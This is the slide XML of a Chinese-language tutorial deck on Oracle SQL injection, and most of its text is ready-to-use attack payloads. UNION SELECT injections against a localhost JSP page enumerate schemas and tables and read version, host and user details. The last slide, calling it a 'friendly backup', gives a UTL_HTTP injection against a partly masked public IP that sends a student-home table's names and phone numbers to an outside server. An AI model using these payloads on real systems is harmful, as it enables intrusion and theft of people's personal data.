          <a:xfrm>
            <a:off x="1395730" y="1576070"/>
            <a:ext cx="6352540" cy="199072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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle查询分页tips：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle查询分页的时候没有Mysql那么方便，Oracle可不能</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>limit 0,1而是通过三层查询嵌套的方式实现分页：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from session_roles) A WHERE ROWNUM &lt;= 1 ) WHERE RN </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt;= 0 </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle查询分页tips：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Oracle里面没有类似于Mysql的group_concat,用分页去取数据，</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不过有更加简单的方法。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用UNION SELECT 查询：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 UNION ALL </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT NULL, NULL, NULL, NVL(CAST(OWNER AS </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VARCHAR(4000)),CHR(32)) FROM (SELECT DISTINCT(OWNER) </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FROM SYS.ALL_TABLES)--</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="1038225"/>
            <a:ext cx="5714365" cy="306641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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>再来看一下我们丑陋的在页面展示数据的代码：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接下来的任务就是收集信息了，上面我们已经收集到数据库所有的</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户的用户名和我们当前用户的权限。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有的数据库表：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1482725"/>
            <a:ext cx="6743065" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有的数据库表：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 UNION ALL SELECT NULL, NULL, NULL, NVL(CAST(OWNER AS VARCHAR(4000)),CHR(32))||CHR(45)||CHR(45)||CHR(45)||CHR(45)||CHR(45)||CHR(45)||NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TABLES WHERE OWNER IN (CHR(67)||CHR(84)||CHR(88)||CHR(83)||CHR(89)||CHR(83),CHR(69)||CHR(88)||CHR(70)||CHR(83)||CHR(89)||CHR(83),CHR(77)||CHR(68)||CHR(83)||CHR(89)||CHR(83),CHR(79)||CHR(76)||CHR(65)||CHR(80)||CHR(83)||CHR(89)||CHR(83),CHR(83)||CHR(67)||CHR(79)||CHR(84)||CHR(84),CHR(83)||CHR(89)||CHR(83),CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77),CHR(87)||CHR(77)||CHR(83)||CHR(89)||CHR(83))—</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110230" y="1109980"/>
            <a:ext cx="2923540" cy="292354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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当UNION ALL SELECT 不起作用的时候我们可以用上面的Oracle</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分页去挨个读取，缺点就是效率没有UNION ALL SELECT高。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息版本获取：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://localhost/SqlInjection/index.jsp?id=1 and 1=2 UNION </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT NULL, NULL, NULL, (select banner from </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sys.v_$version where rownum=1) from dual—</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352675" y="1809750"/>
            <a:ext cx="4438015" cy="15240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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取启动Oracle的用户名:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select SYS_CONTEXT ('USERENV','OS_USER') from dual;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器监听IP:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select utl_inaddr.get_host_address from dual;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器操作系统:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select member from v$logfile where rownum=1;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当前连接用户:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取当前连接的数据库名：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select SYS_CONTEXT ('USERENV', 'DB_NAME') from dual;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关于获取敏感的表和字段说明：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、获取所有的字段schema：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from user_tab_columns</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、获取当前用户权限下的所有的表：</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM  User_tables</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle高级注入：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、友情备份</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用Oracle的utl_http包。Oracle的确是非常的强大，utl_http就</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能过直接对外发送Http请求。我们可以利用utl_http去SQL注入，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>那么我们一样可以利用utl_http去做友情备份。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构建以下SQL注入语句：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://60.xxx.xx.131/xxx/aao_66/index.jsp?fid=1+and+'1'in(SELECT+UTL_HTTP.request('http://xxx.cn:8080/xxxx/mysql.jsp?data='||ID||'----'||USERID||'----'||NAME||'----'||RELATION||'----'||OCCUPATION||'----'||POSITION||'----'||ASSN||UNIT||'----'||'----'||TEL)+FROM+STU_HOME)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051560" y="1029335"/>
            <a:ext cx="6743065" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1420495" y="2423160"/>
            <a:ext cx="4542790" cy="19431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a:sym typeface="+mn-ea"/>
              </a:rPr>
